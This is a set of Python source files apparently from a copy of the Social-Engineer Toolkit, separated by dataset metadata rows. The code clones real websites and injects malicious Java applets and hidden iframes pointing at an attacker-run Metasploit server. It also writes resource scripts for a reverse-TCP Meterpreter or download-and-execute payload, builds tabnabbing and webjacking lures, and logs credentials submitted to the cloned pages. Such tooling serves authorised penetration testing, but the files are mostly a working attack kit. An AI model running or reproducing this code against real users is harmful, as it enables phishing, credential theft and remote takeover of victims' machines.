if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean" or exploit == "exploit/multi/browser/java_jre17_jmxbean_2":
print("[*] Selecting Java Meterpreter as payload since it is exploit specific.")
choice1 = ("java/meterpreter/reverse_tcp")
if multiattack == "off":
port = input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "":
port = "443"
# check to see if we need to use the multi attack vector in java
if not os.path.isfile(userconfigpath + "multi_java"):
filewrite = open(userconfigpath + "meta_config", "w")
if os.path.isfile(userconfigpath + "multi_java"):
filewrite = open(userconfigpath + "meta_config", "a")
filewrite.write("use " + exploit + "\n")
filewrite.write("set PAYLOAD " + choice1 + "\n")
filewrite.write("set LHOST " + ipaddr + "\n")
filewrite.write("set LPORT %s" % (port) + "\n")
#filewrite.write("set ENCODING shikata_ga_nai"+"\n")
filewrite.write("set URIPATH /" + "\n")
if choice1 == ("windows/download_exec"):
print("You selected the download and execute payload. Enter the URL to your executable.")
print("Example would be http://172.16.32.129/malicious.exe")
set_url = input(setprompt(["4"], "URL to the executable"))
filewrite.write("set URL %s" % (set_url) + "\n")
# if it isn't used for webdav then redirect to metasploit iframe
# configuration setting
if exploit != 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
if exploit != 'windows/browser/ms10_046_shortcut_icon_dllloader':
if exploit != 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT %s" % (metasploit_iframe) + "\n")
# if webdav is needed for exploit, change base port
if exploit == 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/ms10_046_shortcut_icon_dllloader':
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT 80" + "\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
extension = input(
setprompt(["4"], "Extension types for this exploit [all]"))
if extension == '':
filewrite.write(
"set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html" + "\n")
else:
filewrite.write("set EXTENSIONS %s" % (extension) + "\n")
filewrite.write("set ExitOnSession false\n")
# if we are using multiple meterpreter multiscripts
if meterpreter_multi == "ON":
multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close()
# auto migration
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
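# meta_config now contains a complete msfconsole resource script (module,
# payload, LHOST/LPORT, SRVPORT, autorun settings and "exploit -j"); other
# parts of SET later launch it with "msfconsole -r <userconfigpath>/meta_config".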
# close webdav file if it was turned on
if webdav_enabled == "on":
webdav_write.close()
# this basically sets a flag we need to make some custom changes in web_server.py to get
# the docbase exploit to work properly
if exploit == ("windows/browser/java_docbase_bof"):
filewrite = open(userconfigpath + "docbase.file", "w")
filewrite.write("DOCBASE=ON")
filewrite.close()
| 6,833 | Python | .py | 153 | 40.339869 | 359 | 0.690283 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,811 | cloner.py | CHEGEBB_africana-framework/externals/set/src/webattack/web_clone/cloner.py | #!/usr/bin/env python3
#
# This file clones a website for SET to use in conjunction with the java
# applet attack.
#
from src.core.setcore import *
import subprocess
import os
import sys
import time
import re
import shutil
import urllib
# needed for python3
try: import urllib.request
except ImportError:
import urllib2
pass
operating_system = check_os()
definepath = os.getcwd()
sys.path.append("/etc/setoolkit")
from set_config import USER_AGENT_STRING as user_agent
from set_config import WEB_PORT as web_port
from set_config import JAVA_ID_PARAM as java_id
from set_config import JAVA_REPEATER as java_repeater # Boolean
from set_config import JAVA_TIME as java_time
from set_config import METASPLOIT_IFRAME_PORT as metasploit_iframe
from set_config import AUTO_REDIRECT as auto_redirect # Boolean
from set_config import UNC_EMBED as unc_embed # Boolean
sys.path.append(definepath)
track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input("Enter your IP address: ")
update_options("IPADDR=" + ipaddr)
# Define base value
site_cloned = True
# GRAB DEFAULT PORT FOR WEB SERVER
meterpreter_iframe = "8080"
# make dir if needed
if not os.path.isdir(userconfigpath + "web_clone/"):
os.makedirs(userconfigpath + "web_clone")
# if we used a proxy configuration from the set-proxy
if os.path.isfile(userconfigpath + "proxy.confg"):
fileopen = open(userconfigpath + "proxy.config", "r")
proxy_config = fileopen.read().rstrip()
# just do a ls
if not os.path.isfile(userconfigpath + "proxy.confg"):
proxy_config = "ls"
# if counter == 0: web_port=80
webdav_meta = 0
# see if exploit requires webdav
try:
fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT %s" % (metasploit_iframe), line)
if not match2:
webdav_meta = 80
except:
pass
template = ""
# Grab custom or set defined
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("TEMPLATE=", line)
if match:
line = line.split("=")
template = line[1]
# grab attack_vector specification
attack_vector = ""
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector", "r").readlines()
for line in fileopen:
attack_vector = line.rstrip()
# generate a random string for obfsucation we will do the same for nix and
# mac bins
# windows executable random name
rand_gen_win = generate_random_string(6, 15)
# mac elf binary random name
rand_gen_mac = generate_random_string(6, 15)
# nix elf binary random name
rand_gen_nix = generate_random_string(6, 15)
# randomize name for java applet
rand_gen_applet = generate_random_string(6, 15) + ".jar"
# update the SET options
update_options("APPLET_NAME=" + rand_gen_applet)
try:
# open our config file that was specified in SET
fileopen = open(userconfigpath + "site.template", "r").readlines()
# start loop here
url_counter = 0
for line in fileopen:
line = line.rstrip()
# look for config file and parse for URL
match = re.search("URL=", line)
if match:
# replace the URL designator with nothing
line = line.replace("URL=", "")
# define url to clone here
url = line.rstrip()
# if we aren't using multi attack with templates do this
if url != "NULL":
if template != "SET":
print((bcolors.YELLOW + "\n[*] Cloning the website: " + (url)))
print(("[*] This could take a little bit..." + bcolors.ENDC))
# clone the website
if template != "SELF":
# clean up old stuff
# set counter
counter = 0
# try except block in case no internet connection, route to Internet,
# etc.
try:
# check if we have wget, if we don't then use urllib2 - special thanks to chrismaddalena for the pull request!
# wget is called, but output is sent to devnull to hide "wget:
# missing URL" error
DNULL = open(os.devnull, 'w')
wget = subprocess.call(
'wget', shell=True, stdout=DNULL, stderr=subprocess.STDOUT)
if wget == 1:
if check_config("WGET_DEEP").lower() == "on":
subprocess.Popen('%s;wget -H -N -k -p -l 2 -nd -P %s/web_clone/ --no-check-certificate -U "%s" "%s";' %
(proxy_config, userconfigpath, user_agent, url), shell=True).wait()
else:
subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' %
(proxy_config, userconfigpath, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
else:
# if we don't have wget installed we will use python to rip,
# not as good as wget
headers = {'User-Agent': user_agent}
# read in the websites
try:
req = urllib.request.Request(url, None, headers)
# read in the data from the initial request
html = urllib.request.urlopen(req).read()
# if length isnt much then we didnt get the site cloned
except AttributeError:
req = urllib.request.Request(url, headers=headers)
html = urllib.request.urlopen(req).read()
if len(html) > 1:
# if the site has cloned properly
site_cloned = True
# open file for writing
filewrite = open(userconfigpath + "web_clone/index.html", "w")
# write the data back from the request
filewrite.write(html)
# close the file
filewrite.close()
# if it failed ;(
except Exception as err:
print(err)
pass
# If the website did not clone properly, exit out.
if not os.path.isfile(userconfigpath + "web_clone/index.html"):
print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue()
site_cloned = False
# add file to let set interactive shell know it was unsuccessful
filewrite = open(userconfigpath + "cloner.failed", "w")
filewrite.write("failed")
filewrite.close()
if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(userconfigpath + "web_clone/index.html", "r", encoding='utf-8', errors='ignore')
counter = 0
for line in fileopen:
counter = counter + 1
if counter == 1 or counter == 0:
print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue()
site_cloned = False
os.remove(userconfigpath + "web_clone/index.html")
# add file to let set interactive shell know it was
# unsuccessful
filewrite = open(userconfigpath + "cloner.failed", "w")
filewrite.write("failed")
filewrite.close()
if site_cloned == True:
# make a backup of the site if needed
shutil.copyfile(userconfigpath + "web_clone/index.html",
userconfigpath + "web_clone/index.html.bak")
if site_cloned == True:
# if we specify UNC embedding
if unc_embed == True:
fileopen = open(userconfigpath + "web_clone/index.html", "r")
index_database = fileopen.read()
filewrite = open(userconfigpath + "web_clone/index.html", "w")
# Open the UNC EMBED
fileopen4 = open("src/webattack/web_clone/unc.database", "r")
unc_database = fileopen4.read()
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub(
"</body.*?>", unc_database + "\n</body>", index_database)
if not match:
index_database = re.sub(
"<head.*?>", "\n<head>" + unc_database, index_database)
filewrite.write(index_database)
filewrite.close()
# java applet attack vector
# check for java flag for multi attack
multi_java = False
if os.path.isfile(userconfigpath + "multi_java"):
multi_java = True
if attack_vector == "java" or multi_java:
# Here we parse through the new website and add our java applet code, its a hack for now
# Wrote this on the plane to Russia, easiest way to do this without
# internet access :P
print((
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC))
# Read in newly created index.html
time.sleep(2)
if not os.path.isfile(userconfigpath + "web_clone/index.html"):
# trigger error that we were unable to grab the website :(
print_error(
"Unable to clone the website it appears. Email us to fix.")
sys.exit()
fileopen = open(userconfigpath + "web_clone/index.html", "r")
# Read add-on for java applet
fileopen2 = open("src/webattack/web_clone/applet.database", "r")
# Write to new file with java applet added
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
fileopen3 = open("src/webattack/web_clone/repeater.database", "r")
# this is our cloned website
index_database = fileopen.read()
# this is our applet database
applet_database = fileopen2.read()
# this is our repeater database
repeater_database = fileopen3.read()
# here we begin replacing specifics in order to prep java applet
# payload
applet_database = applet_database.replace("msf.exe", rand_gen_win)
applet_database = applet_database.replace("mac.bin", rand_gen_mac)
applet_database = applet_database.replace("nix.bin", rand_gen_nix)
applet_database = applet_database.replace(
"RANDOMIZE1", rand_gen_applet)
update_options("MSF.EXE=%s\nMAC.BIN=%s\nNIX.BIN=%s" %
(rand_gen_win, rand_gen_mac, rand_gen_nix))
# close the file up
applet_database = applet_database.replace(
"ipaddrhere", ipaddr + ":" + str(web_port))
# set the java field
applet_database = applet_database.replace(
"IDREPLACEHERE", java_id, 2)
# set up everything for the unc path
if unc_embed == True:
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
# set up the java repeater
if java_repeater == True:
repeater_database = repeater_database.replace(
"IDREPLACEHERE", java_id, 2)
repeater_database = repeater_database.replace(
"TIMEHEREPLZ", java_time)
repeater_database = repeater_database.replace(
"URLHEREPLZ", url)
repeater_database = repeater_database.replace(
"RANDOMFUNCTION", generate_random_string(5, 15), 3)
# do a quick sanity check and make sure body is standard
index_database = re.sub("</BODY.*?>", "</body>", index_database)
index_database = re.sub("<HEAD.*?>", "<head>", index_database)
index_database = re.sub("<BODY.*?>", "<body>", index_database)
# start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub(
"<applet ", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub(
"<head.*?>", "\n<head>" + repeater_database, index_database)
counter = 0
# confirm we can find body
match = re.search("</body.*?>", index_database)
if match:
counter = 1
index_database = re.sub(
"</body.*?>", applet_database + "\n</body>", index_database)
if auto_redirect == True:
index_database = index_database.replace(
'<param name="9" value=""', '<param name="9" value="%s"' % (url))
if not match:
match = re.search("<head.*?>", index_database)
if match:
counter = 1
index_database = re.sub(
"<head.*?>", "\n<head>" + applet_database, index_database)
if auto_redirect == True:
index_database = index_database.replace(
'<param name="9" value=""', '<param name="9" value="%s"' % (url))
# start appending and prepping the index file
if java_repeater == True:
match = re.search("</body.*?>", index_database)
if match:
index_database = re.sub(
"<applet", repeater_database + "\n<applet ", index_database)
if not match:
index_database = re.sub(
"<head.*?>", "\n<head>" + repeater_database, index_database)
if counter == 0:
print_error("Unable to clone the website...Sorry.")
print_error(
"This is usally caused by a missing body tag on a website.")
print_error("Try a diferent site and attempt it again.")
sys.exit(1)
# write the file out
filewrite.write(index_database)
# close the file after done writing
filewrite.close()
print((bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win + "\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC))
# if we are using HTA attack
if check_options("ATTACK_VECTOR") == "HTA":
if os.path.isfile(userconfigpath + "Launcher.hta"):
data1 = open(userconfigpath + "web_clone/index.html", "r").read()
data2 = open(userconfigpath + "hta_index", "r").read()
data3 = data1.replace("</body>", data2 + "</body>")
filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data3)
filewrite.close()
print_status("Copying over files to Apache server...")
apache_dir = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_dir + "/html"):
apache_dir = apache_dir + "/html"
shutil.copyfile(userconfigpath + "web_clone/index.html",
apache_dir + "/index.html")
shutil.copyfile(userconfigpath + "Launcher.hta",
apache_dir + "/Launcher.hta")
print_status("Launching Metapsloit.. Please wait one.")
subprocess.Popen("%smsfconsole -r %s/meta_config" %
(meta_path(), userconfigpath), shell=True).wait()
# selection of browser exploits
# check to see if multiattack is in use
multi_meta = "off"
if os.path.isfile(userconfigpath + "multi_meta"):
multi_meta = "on"
if attack_vector == "browser" or multi_meta == "on":
print((
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC))
# Read in newly created index.html
if attack_vector == "multiattack":
if os.path.isfile(userconfigpath + "web_clone/index.html"):
os.remove(userconfigpath + "web_clone/index.html")
# check to see if the file is there first
if not os.path.isfile(userconfigpath + "web_clone/index.html.new"):
if os.path.isfile(userconfigpath + "web_clone/index.html.bak"):
shutil.copyfile(
userconfigpath + "web_clone/index.html.bak", userconfigpath + "web_clone/index.html.new")
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.copyfile(
userconfigpath + "web_clone/index.html.new", userconfigpath + "web_clone/index.html")
time.sleep(1)
fileopen = open(userconfigpath + "web_clone/index.html", "r", encoding='utf-8', errors='ignore').readlines()
filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
counter = 0
for line in fileopen:
counter = 0
if attack_vector == "browser":
match = re.search(rand_gen_applet, line)
if match:
line = line.replace(rand_gen_applet, "invalid.jar")
filewrite.write(line)
counter = 1
match = re.search("<head.*?>", line, flags=re.IGNORECASE)
if match:
header = match.group(0)
match2 = re.search("<head.*?>", line, flags=re.IGNORECASE)
if match2:
header = match.group(0)
if webdav_meta != 80:
line = line.replace(
header, header + '<iframe src ="http://%s:%s/" width="0" height="0" scrolling="no"></iframe>' % (ipaddr, metasploit_iframe))
filewrite.write(line)
counter = 1
if webdav_meta == 80:
line = line.replace(
header, header + '<head><meta HTTP-EQUIV="REFRESH" content="4; url=http://%s">' % (ipaddr))
if counter == 0:
filewrite.write(line)
try:
filewrite.close()
except:
pass
print((
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC))
if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack":
if not os.path.isfile(userconfigpath + "web_clone/%s" % (rand_gen_applet)):
shutil.copyfile("src/html/Signed_Update.jar.orig",
userconfigpath + "web_clone/%s" % (rand_gen_applet))
# move index.html to our main website
if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.move(userconfigpath + "web_clone/index.html.new",
userconfigpath + "web_clone/index.html")
# catch keyboard control-c
except KeyboardInterrupt:
print ("Control-C detected, exiting gracefully...\n")
exit_set()
| 20,114 | Python | .py | 405 | 36.671605 | 185 | 0.561447 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,812 | tabnabbing.py | CHEGEBB_africana-framework/externals/set/src/webattack/tabnabbing/tabnabbing.py | #!/usr/bin/env python3
import subprocess
import re
import urllib.request
import shutil
import os
from src.core.setcore import *
#
# TabNabbing Source here
#
#
# pull the timing for SET CONFIG on webjacking
apache_check = check_config("APACHE_SERVER=").lower()
if apache_check == "on": apache_dir = check_config("APACHE_DIRECTORY=").lower()
webjacking_timing = check_config("WEBJACKING_TIME=")
# grab attack_vector specification
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
attack_vector = line.rstrip()
# need to see if we created file to trigger multi attack webjacking
multi_webjacking = "off"
if os.path.isfile(userconfigpath + "multi_webjacking"):
multi_webjacking = "on"
# Open the IPADDR file
ipaddr = ""
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
# pull URL field so we can pull favicon later on
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
match = re.search("URL=", line)
if match:
URL = line.replace("URL=", "")
if attack_vector == "tabnabbing":
URL = URL.replace("https://", "")
URL = URL.replace("http://", "")
URL = re.split("/", URL)
URL = URL[0]
URL = "http://" + URL
# move cloned site to index2.html
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" %
(userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# grab the source and write it out to the cloned directory
fileopen = open("src/webattack/tabnabbing/source.js", "r")
# write it to dir
filewrite = open(userconfigpath + "web_clone/source.js", "w")
# loop
for line in fileopen:
line = line.rstrip()
match = re.search("URLHERE", line)
if match:
line = line.replace("URLHERE", URL)
filewrite.write(line + "\n")
filewrite.close()
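# At this point the cloned page has been moved aside to index2.html and a
# URL-patched copy of source.js sits in web_clone/. For the tabnabbing vector
# the served index.html (written below) is only a "please wait" placeholder
# that loads source.js, and the real site's favicon is fetched so the idle tab
# looks legitimate; the webjacking vector instead serves a "site has moved"
# link that opens index2.html after the configured delay.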
if attack_vector == "tabnabbing":
# grab favicon
favicon = urllib.request.urlopen("%s/favicon.ico" % (URL))
output = open(userconfigpath + '/web_clone/favicon.ico', 'wb')
output.write(favicon.read())
output.close()
filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
filewrite1.write(
'<head><script type="text/javascript" src="source.js"></script></head>\n')
filewrite1.write("<body>\n")
filewrite1.write("Please wait while the site loads...\n")
filewrite1.write("</body>\n")
filewrite1.close()
if apache_check == "on": shutil.copy(userconfigpath + "web_clone/source.js", apache_dir)
# define webjacking or multi webjacking here
if attack_vector == "webjacking" or multi_webjacking == "on":
filewrite1 = open(userconfigpath + "web_clone/index.html", "w")
filewrite1.write("<script>\n")
filewrite1.write("function a(){\n")
filewrite1.write(
'''a= window.open("http://%s/index2.html", "iframe", "");\n''' % (ipaddr))
filewrite1.write("}\n")
filewrite1.write("</script>\n")
filewrite1.write('''<a href="%s" onclick="t=setTimeout('a()', %s);" target="iframe"><h1>The site %s has moved, click here to go to the new location.</h1></a>\n''' %
(URL, webjacking_timing, URL))
filewrite1.close()
| 3,201 | Python | .py | 79 | 36.164557 | 168 | 0.666345 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,813 | report_generator.py | CHEGEBB_africana-framework/externals/set/src/webattack/harvester/report_generator.py | #!/usr/bin/env python3
import re
import subprocess
import os
import datetime
from src.core.setcore import *
# make sure the reports directory is created
if not os.path.isdir(userconfigpath + "reports/"): os.makedirs(userconfigpath + "reports/")
#
# Quick report generation script
#
# Colors below
class bcolors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
PINK = '\033[95m'
ENDC = '\033[0m'
# End colors
# definepath
definepath = os.getcwd()
# grab URL and report information
now = datetime.datetime.today()
fileopen = open(userconfigpath + "site.template", "r")
site_template = open(userconfigpath + "site.template", "r").readlines()
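# site.template is produced by the harvester: it holds the cloned URL= line
# plus "PARAM:" lines for each captured POST field, with "BREAKHERE" markers
# separating individual form submissions; the loop below folds those markers
# into <url><param>...</param></url> entries in the XML report.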
fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r")
for line in fileopen:
match = re.search("URL=", line)
if match:
url = line.replace("URL=http://", "")
url = line.replace("URL=https://", "")
filewrite2 = open(userconfigpath + "reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1:
counter = 0
#filewrite = open(userconfigpath + "reports/%s.html" % (now), "a")
match1 = re.search("REPLACEHEREDUDE", line2)
if match1:
line2 = line2.replace("REPLACEHEREDUDE", url)
#filewrite.write(line2)
url_xml = url.rstrip()
filewrite2.write(" %s" % (url_xml) + "\n")
counter = 1
match2 = re.search("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
if match2:
line2 = line2.replace(
"If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter = 1
#filewrite.write(line2)
opentag = True
for line3 in site_template:
match3 = re.search("PARAM:", line3)
if match3:
xml = line3.replace("PARAM: ", "")
xml = xml.rstrip()
#filewrite.write(line3 + "<br>")
if opentag:
filewrite2.write(r" <url>")
opentag = False
filewrite2.write(
r" <param>%s</param>" % (xml) + "\n")
match4 = re.search("BREAKHERE", line3)
if match4:
filewrite2.write(" </url>" + "\n")
opentag = True
#filewrite.write(
# "<br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>")
# look for how many people visited the website
match5 = re.search("VISITORSHERE", line2)
if match5:
if os.path.isfile(userconfigpath + "visits.file"):
fileopen3 = open(userconfigpath + "visits.file", "r")
counter5 = 0
for line in fileopen3:
if line != "":
line = line.rstrip()
counter5 = counter5 + 1
if line == "":
counter5 = 0
if not os.path.isfile(userconfigpath + "visits.file"):
counter5 = 0
line2 = line2.replace("VISITORSHERE", str(counter5), 2)
counter = 1
# filewrite.write(line2)
match6 = re.search("BITESHERE", line2)
if match6:
if os.path.isfile(userconfigpath + "bites.file"):
fileopen4 = open(userconfigpath + "bites.file", "r")
counter5 = 0
for line in fileopen4:
line = line.rstrip()
counter5 = counter5 + 1
if not os.path.isfile(userconfigpath + "bites.file"):
counter5 = 0
line2 = line2.replace("BITESHERE", str(counter5))
counter = 1
#filewrite.write(line2)
#if counter == 0:
#filewrite.write(line2)
try:
#filewrite.close()
filewrite2.write(r"</harvester>" + "\n")
filewrite2.close()
except:
pass
subprocess.Popen("cp -rf %s/src/core/reports/files %sreports/" % (definepath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print(bcolors.BLUE + "[*] File in XML format exported to %sreports/%s.xml for your reading pleasure..." % (userconfigpath, now) + bcolors.ENDC)
| 4,831 | Python | .py | 110 | 30.772727 | 161 | 0.510308 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,814 | harvester.py | CHEGEBB_africana-framework/externals/set/src/webattack/harvester/harvester.py | #!/usr/bin/env python3
import subprocess
import sys
import os
import re
import cgi
import posixpath
import mimetypes
import urllib.parse
import shutil
import html
# I am Swam Htet Aung I repair some error in this code for python latest versions
# need for python2 -> 3
try:
from http.server import *
except ImportError:
from BaseHTTPServer import *
import socket
# needed for python2 -> 3
try:
from SocketServer import *
import SocketServer
except ImportError:
from socketserver import *
import socketserver
import threading
import datetime
import shutil
# get path to normal
definepath = os.getcwd()
sys.path.append(definepath)
from src.core.setcore import *
sys.path.append("/etc/setoolkit")
from set_config import APACHE_SERVER as apache_check
from set_config import WEBATTACK_EMAIL as webattack_email
from set_config import TRACK_EMAIL_ADDRESSES as track_email
from set_config import HARVESTER_LOG as logpath
sys.path.append(definepath)
if track_email == True:
print_status("You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
apache_check = True
############################################
# Credential harvester #
############################################
# define the current working directory
definepath = os.getcwd()
me = mod_name()
# append python to our current working directory
sys.path.append(definepath)
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite = open("%s/src/logs/harvester.log" % (os.getcwd()), "w")
filewrite.write("")
filewrite.close()
# import the base setcore libraries
from src.core.setcore import *
# detect openssl module
try:
# from OpenSSL import SSL
from OpenSSL import SSL
# handle import error that openssl is not there
except Exception as err:
# print("Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibility will be affected.")
# print_status("Printing error: " + str(err))
pass
attack_vector = ""
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == 'multiattack':
attack_vector = 'multiattack'
# if attack vector isnt the multiattack
if attack_vector != "multiattack":
print(bcolors.RED + """
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.""" + bcolors.ENDC)
# see if we're tabnabbing or multiattack
homepath = os.getcwd()
# pull scraper
try:
module_reload(src.webattack.harvester.scraper)
except:
import src.webattack.harvester.scraper
# GRAB DEFAULT PORT FOR WEB SERVER AND CHECK FOR COMMAND CENTER
command_center = "off"
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
counter = 0
for line in fileopen:
line = line.rstrip()
match = re.search("WEB_PORT=", line)
if match:
line = line.replace("WEB_PORT=", "")
web_port = line
counter = 1
match2 = re.search("COMMAND_CENTER=ON", line)
if match2:
command_center = "on"
        command_center_write = open(userconfigpath + "cc_harvester_hit", "w")
# if nada default port 80
if counter == 0:
web_port = 80
# pull URL field
counter = 0
fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("URL=", line)
if match:
        RAW_URL = line.replace("URL=", "")
        # strip the scheme so URL holds just the host/path portion
        URL = RAW_URL.replace("http://", "").replace("https://", "")
counter = 1
# this checks the set_config to see if we need to redirect to a different
# website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=")
if harvester_redirect.lower() == "on":
URL = check_config("HARVESTER_URL=")
counter = 1
if counter == 0:
URL = ''
# set ssl flag to false by default (counter basically)
ssl_flag = "false"
self_signed = "false"
# SEE IF WE WANT TO USE SSL
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("WEBATTACK_SSL=ON", line)
if match:
# if we hit on ssl being on, set flag to true
ssl_flag = 'true'
# if flag is true begin prepping SSL stuff
if ssl_flag == 'true':
# set another loop for find other variables we need for SSL setup
for line in fileopen:
# strip line feeds and carriage returns
line = line.rstrip()
# begin search for flags we need
match = re.search("SELF_SIGNED_CERT=ON", line)
# if we hit, lets create our own certificate
if match:
self_signed = "true"
# need to import our ssl module for creating a CA
sys.path.append("src/core/ssl")
# import our ssl module
import setssl
subprocess.Popen("cp %s/CA/*.pem %s" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (userconfigpath, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate
if self_signed == "false":
for line in fileopen:
line = line.rstrip()
# search for cert path
match = re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
if match:
pem_client = line.replace("PEM_CLIENT=", "")
if not os.path.isfile(pem_client):
print("\nUnable to find PEM file, check location and config again.")
exit_set()
if os.path.isfile(pem_client):
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2 = re.search("PEM_SERVER=", line)
if match2:
pem_server = line.replace("PEM_SERVER=", "")
if not os.path.isfile(pem_server):
print("\nUnable to find PEM file, check location and config again.")
exit_set()
if os.path.isfile(pem_server):
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, userconfigpath),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# url decode for postbacks
def htc(m):
return chr(int(m.group(1), 16))
# url decode
def urldecode(url):
url = url.decode('utf-8')
    # hex digits only run 0-9 and a-f; the original a-h range was a typo
    rex = re.compile('%([0-9a-fA-F][0-9a-fA-F])', re.M)
return rex.sub(htc, url)
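# Illustrative sketch (added for clarity, not part of the original tool): how the two
# helpers above cooperate to decode a percent-encoded POST body. The byte string
# below is a made-up example value.
def _urldecode_example():
    sample = b"username=admin&passwd=p%40ssw0rd"
    # urldecode() decodes the bytes to str, then htc() turns every %XX escape into
    # the character chr(int("XX", 16))
    return urldecode(sample)  # -> "username=admin&passwd=p@ssw0rd"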
# here is where we specify how many people actually visited versus fell for it
visits = open(userconfigpath + "visits.file", "a")
bites = open(userconfigpath + "bites.file", "a")
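# "visits" gets a line appended on every GET of the cloned page, while "bites" only
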